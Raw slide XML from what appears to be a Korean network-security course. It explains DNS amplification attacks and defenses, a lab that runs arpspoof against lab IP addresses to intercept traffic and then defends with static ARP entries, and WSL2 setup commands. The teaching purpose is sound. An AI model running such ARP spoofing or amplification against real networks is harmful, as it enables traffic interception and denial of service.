              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>타입의 쿼리를 이용하여 트래픽이 증폭 된다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>공격자 입장에서</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>, Open DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>가 모두 좀비 피씨인 셈으로</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>효율적인 공격이 가능하다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="256203139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/Theory/T32 </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>증폭 공격</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>(DNS Amplification)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2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97C31125-175B-41E5-8957-CB9F98BCE6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71" y="2269671"/>
            <a:ext cx="4751547" cy="3266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374DDD-7E51-4429-84D0-B1ED0D28412F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5772150" y="2029898"/>
            <a:ext cx="5821587" cy="46092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dirty="0"/>
              <a:t>방어방법은 다양하다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>서버에서 재귀를 할 수 없도록 설정한다 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>이는</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>도메인 정보가 없는 질의에 대해 응답을 못 할 수도 있다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>. -&gt; /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>resolve.conf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>파일에 외부 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>등록</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>ANY </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>쿼리를 못하게 설정한다</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> 변조 필터링 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>(syn-cookie mechanism) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>보안장비를 배치한다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>방화벽 설정을 통해 특정 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>byte </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>이상의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>응답을 차단한다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>매 초마다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>쿼리의 제한을 둔다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>내부 사용자의 주소만 재귀 쿼리를 허용한다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="235354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2846182976"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3290207" y="2813240"/>
          <a:ext cx="4612822" cy="2216785"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="1842745">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2798934004"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2770077">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6" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>WSL2(command)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r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
                        <a:t>(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
                        <a:t>명령어</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32692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WSLOfflinePackageInstall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오프라인</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패키지 설치 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>(bgpdump)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6320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1"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Network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featurename:Microsoft-Windows-Subsystem-Linux</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featurename:VirtualMachinePlatform</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may take a few minutes…”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dirty="0"/>
              <a:t>windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>terminal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> 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dirty="0"/>
              <a:t>다시 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>“exit”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324792155"/>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5"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6"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7"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SYN Flooding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8"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9"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10"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11"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전송되는 모든 패킷들이 공격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(10.10.1.166)</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전송되도록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9368900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서버에서 공격 서버를 게이트웨이로 인식하도록 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>ARP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>스푸핑</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> 공격을 주기적으로 수행</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>arpspoof</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> –t 10.10.1.101(Target IP) 10.10.1.1(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>호스트 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>IP) &amp;(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>백그라운드 실행</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>    # </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>arpspoof</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> –t 10.10.1.101 10.10.1.1 &amp;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Wireshark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>를 사용하여 실습 서버에서 게이트웨이로 전송한 패킷들이 공격 서버로 전송되는 것을 확인</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72040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 확인을 위해 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>명령으로 공격서버에 접속하여 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>MAC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>주소를 확인해보면 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>MAC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>주소가 변조 되었다는 것을 알 수 있다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="100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197191872">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E890E658-F2C6-4221-91E8-AB712CD86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1109133"/>
            <a:ext cx="54006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197185712">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{55727A18-6557-42E6-83B7-798CFCA9A6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07"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="500180" y="3043882"/>
            <a:ext cx="5400675" cy="3323052"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1029" name="_x197186512">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B3269E7C-7B5F-4F72-9E70-359283297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5" y="871008"/>
            <a:ext cx="5400675" cy="304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A4E4ED3-BDCA-4D45-97D1-5F6CDD960B13}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6183088" y="4291914"/>
            <a:ext cx="5616792" cy="2197084"/>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031" name="_x197192112">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{900F0CEB-751B-4FFF-A4C1-6BCBFA25F5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4898652"/>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1967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 y="221103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2049" name="_x197187632">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B06D8ADC-3A95-4866-A761-646AF88742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63600"/>
            <a:ext cx="5400675" cy="70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07661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와의 통신을 위해</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캐시에 정적으로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DF88C7B9-9BAF-4477-A2F0-B4FB8C5AB8D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19415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Wireshark </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>실행</a:t>
            </a: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a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicPeriod" startAt="2"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>Wireshark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>로 패킷 확인</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>* 지속적으로 잘못된 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>MAC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>주소가 담긴 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>ARP Reply Packet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>을 보내 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>victim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>ARP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>캐시를 조작하게 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203553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arp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> -s 10.10.1.1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>aa:bb:cc:dd:ee:ff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> (MAC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>주소</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"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a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>4.  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>정적으로 설정이 되어 있는지 확인</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>arp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> -a</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197193632">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5D830F87-2103-47B3-A625-23A5DDE0E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47710"/>
            <a:ext cx="5400675" cy="268128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197187392">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{22CF92EE-012E-4DA5-8390-7E25C8A8F5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957"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="500180" y="4286660"/>
            <a:ext cx="5400675" cy="2088740"/>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197193552">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A5BACF93-B2D1-4B2B-BE76-266053177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134" y="747710"/>
            <a:ext cx="4198938" cy="182563"/>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197193632">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{47162951-6D3E-485B-92B5-3D5A0E55B3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6134" y="1786467"/>
            <a:ext cx="4297363" cy="4270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6B17F8-913C-4664-A837-ED28F8D00748}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6183088" y="2543623"/>
            <a:ext cx="5616792" cy="394537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p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3081" name="_x197185712">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{94E486C6-C272-413D-B244-829BC82EB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0275" y="3009898"/>
            <a:ext cx="3222625"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6492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서버를 대상으로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192.168.99.11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데이터 크기를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91277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/Environ/WSL2(command)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> WSL2 command </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>설치</a:t>
            </a:r>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742CF30C-F93B-4682-BAAB-B954723A9E9E}"/>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TextBox 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0BAAA65A-71A5-4780-BF01-B99D6B8C9C7B}"/>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50" dirty="0"/>
              <a:t>2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1050" dirty="0"/>
              <a:t>윈도우 터미널에 아래 명령어를 순서대로 입력해주세요</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1050" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dism.exe /online /enable-feature /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>featurename:Microsoft-Windows-Subsystem-Linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t> /all /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>norestart</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B050"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dism.exe /online /enable-feature /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>featurename:VirtualMachinePlatform</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t> /all /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>norestart</a:t>
            </a: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3. 2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>번 작업이 완료되었다면 설정을 적용하기 위해 컴퓨터를 재부팅 한다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B050"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
